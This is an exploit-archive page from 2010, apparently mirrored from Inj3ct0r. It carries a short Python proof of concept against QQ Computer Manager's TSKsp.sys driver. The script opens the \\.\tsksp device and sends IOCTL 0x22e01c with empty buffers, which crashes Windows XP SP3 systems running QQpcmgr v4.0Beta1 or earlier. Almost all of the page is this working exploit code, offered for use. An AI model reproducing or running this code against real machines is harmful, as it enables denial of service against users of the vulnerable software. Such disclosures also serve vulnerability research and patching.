Home / os / win7

QQ Computer Manager TSKsp.sys Local Denial of Service Exploi

Posted on 09 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>QQ Computer Manager TSKsp.sys Local Denial of Service Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================= QQ Computer Manager TSKsp.sys Local Denial of Service Exploit ============================================================= #!/usr/bin/python ################################################################# # # Title: QQ Computer Manager TSKsp.sys Local Denial of Service Exploit # Author: Lufeng Li of Neusoft Corporation # Vendor: http://pcmgr.qq.com # Vulnerable App: http://dl_dir2.qq.com/invc/qqmaster/setup/QQPCMgr_Setup.exe # Platform: Windows XPSP3 Chinese Simplified # Tested: QQpcmgr v4.0Beta1 # Vulnerable: QQpcmgr&lt;=v4.0Beta1 # ################################################################# from ctypes import * kernel32 = windll.kernel32 Psapi = windll.Psapi if __name__ == '__main__': GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 CREATE_ALWAYS = 0x2 DEVICE_NAME = &quot;\\.\tsksp&quot; dwReturn = c_ulong() out_data = '' in_data = '' driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, CREATE_ALWAYS, 0, None) dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x22e01c, in_data,0, out_data, 0,byref(dwReturn), None) # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP